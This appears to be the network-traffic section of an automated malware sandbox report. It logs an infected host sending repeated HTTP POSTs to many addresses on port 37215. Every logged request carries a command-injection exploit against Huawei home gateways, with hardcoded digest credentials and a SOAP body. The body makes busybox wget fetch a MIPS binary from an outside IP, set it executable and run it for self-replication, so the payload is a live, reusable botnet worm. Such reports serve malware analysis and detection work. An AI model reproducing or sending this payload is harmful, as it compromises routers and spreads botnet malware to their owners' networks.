                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    4192.168.2.1455358197.160.40.7137215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.070878029 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.446922064 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    5192.168.2.1443902221.191.119.20237215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.073781967 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.452655077 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    6192.168.2.143909046.225.21.20737215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.073781967 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.452655077 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    7192.168.2.1460584157.243.201.4737215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.073781967 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.452655077 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    8192.168.2.144294441.71.63.17937215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.079142094 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.485884905 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
